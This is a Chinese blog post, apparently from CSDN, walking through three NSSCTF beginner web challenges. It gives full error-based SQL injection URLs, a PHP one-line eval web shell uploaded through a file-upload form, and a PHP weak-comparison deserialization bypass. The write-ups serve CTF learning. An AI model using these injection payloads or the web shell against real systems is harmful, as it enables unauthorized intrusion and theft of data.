码农知识堂 - 1000bd
  •   Python
  •   PHP
  •   JS/TS
  •   JAVA
  •   C/C++
  •   C#
  •   GO
  •   Kotlin
  •   Swift
  • NSSCTF-Web题目5


    目录

    [SWPUCTF 2021 新生赛]error

    1、题目

    2、知识点

    3、思路

    [LitCTF 2023]作业管理系统

    1、题目

    2、知识点

    3、思路

    [HUBUCTF 2022 新生赛]checkin

    1、题目

    2、知识点

    3、思路


    [SWPUCTF 2021 新生赛]error

    1、题目

    2、知识点

    数据库注入、报错注入

    3、思路

    首先,输入一个1

    输入1'

    数据库语句报错,且报错信息有回显出来,加入注释符

    正常回显,说明当前的闭合方式正确,为单引号的闭合,使用报错函数extractvalue

    http://node4.anna.nssctf.cn:28465/index.php?id=1' and extractvalue(1,concat(0x7e,database())) --+

    得到数据库名为:test_db

    http://node4.anna.nssctf.cn:28465/index.php?id=1' and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='test_db'))) --+

    得到两个表:test_tb,users

    http://node4.anna.nssctf.cn:28465/index.php?id=1' and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema='test_db' and table_name='test_tb'))) --+

    test_tb表的两个字段为:id,flag

    http://node4.anna.nssctf.cn:28465/index.php?id=1' and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema='test_db' and table_name='users'))) --+

    users表的三个字段:id,username,password

    http://node4.anna.nssctf.cn:28465/index.php?id=1' and extractvalue(1,concat(0x7e,(select group_concat(flag) from test_db.test_tb))) --+

    得到flag的前半段,这里以为另外一半藏到别的地方,其实是没完全显示出来,使用函数substring

    substring()

    http://node4.anna.nssctf.cn:28465/index.php?id=1' and extractvalue(1,concat(0x7e,(select substring(group_concat(flag),32,30) from test_db.test_tb))) --+

    合并起来的flag:NSSCTF{eed0ee27-1b46-4520-a7b5-71dd9183d446}


    [LitCTF 2023]作业管理系统

    1、题目

    2、知识点

    文件上传,蚁剑连接

    3、思路

    右键,查看源码,发现登录名和密码

    登录上去

    这里有很多功能,我们可以上传一句话木马文件 flag.php

    @eval($_POST['cmd']); #一句话木马
    ?>

    这里我们可以知道上传到根目录下

    上传成功后使用蚁剑连接

    连接成功后在根目录找到flag文件

    打开flag文件,得到flag

    得到flag:

    NSSCTF{d0dc1586-48ed-4661-8b97-02fd17bf0cd4}


    [HUBUCTF 2022 新生赛]checkin

    1、题目

    2、知识点

    PHP反序列化,数组

    3、思路

    题目给了我们一段代码

    $data_unserialize['username']==$username&&$data_unserialize['password']==$password

    审计代码,意思是username和password的值反序列后的值要相同,这里使用了弱类型比较(==)

    代码中给了两个值,先进行序列化后上传看看,使用在线网站

    PHP 在线工具 | 菜鸟工具 (jyshare.com)

    $info = array(
        'username'=>"this_is_secret",
        'password'=>"this_is_not_known_to_you"
    );
    echo  serialize($info);

    http://node5.anna.nssctf.cn:25489/?info=a:2:{s:8:"username";s:14:"this_is_secret";s:8:"password";s:24:"this_is_not_known_to_you";}

    flag没有出来,因为username和password的值更改了,我们不知道具体的值是什么

    这里我们就要考虑怎么使两个值相同

    弱比较中,true和非空、非零字符串弱比较(==)都是为true,所以我们使两个字段的值都为true

    $info = array(
        'username'=>true,
        'password'=>true
    );
    echo  serialize($info);
     

    将得到的值传给info

    得到flag:NSSCTF{5713f43e-708e-458e-a6fc-fd82c254f8d3}


    这篇文章就先写到这里啦,哪里不懂的或者哪里不足的欢迎批评指正

  • 相关阅读:
    简单快速理解常用的正则表达式
    如何做一个最便宜的小程序?
    15.0、C语言——指针详解(1)
    面向对象之设计原则与设计模式
    猿创征文|date-fns 秒助手函数
    【电路笔记】-脉冲宽度调制(PWM)与电机转速控制
    OK3568 forlinx系统编译过程及问题汇总
    Qt post 传base64图片 服务器接收解析图片失败
    如何通过低代码平台搭建以“督办”为中心的办公管理系统
    【Unity Shader】纹理实践5.0:世界空间下使用法线纹理
  • 原文地址:https://blog.csdn.net/weixin_54055099/article/details/139472089
  • 最新文章
  • 沪漂五周年了:我越来越迷茫了
    Agentic Skill Routing 实战:别再把所有 Skill 塞进 AI Agent 上下文
    MySQL-Seconds_behind_master的精度误差
    [MAF预定义ChatClient中间件-03]CachingChatClient——利用缓存省钱省时间
    AI的至暗历史:从万众期待到被政府撤资,AI的两次死亡徘徊
    Agent OS :五种驯服不确定性的范式
    PortSwigger SQL注入LAB11
    数据库即时编译JIT
    [Begin]AI Learn Data Day 0
    深度学习进阶(二十七)现代 LLM 的核心架构设计其二:SwiGLU
  • 热门文章
  • 十款代码表白小特效 一个比一个浪漫 赶紧收藏起来吧!!!
    奉劝各位学弟学妹们,该打造你的技术影响力了!
    五年了,我在 CSDN 的两个一百万。
    Java俄罗斯方块,老程序员花了一个周末,连接中学年代!
    面试官都震惊,你这网络基础可以啊!
    你真的会用百度吗?我不信 — 那些不为人知的搜索引擎语法
    心情不好的时候,用 Python 画棵樱花树送给自己吧
    通宵一晚做出来的一款类似CS的第一人称射击游戏Demo!原来做游戏也不是很难,连憨憨学妹都学会了!
    13 万字 C 语言从入门到精通保姆级教程2021 年版
    10行代码集2000张美女图,Python爬虫120例,再上征途
小工具 小游戏
Copyright © 2022 侵权请联系2656653265@qq.com    京ICP备2022015340号-1

京公网安备 11010502049817号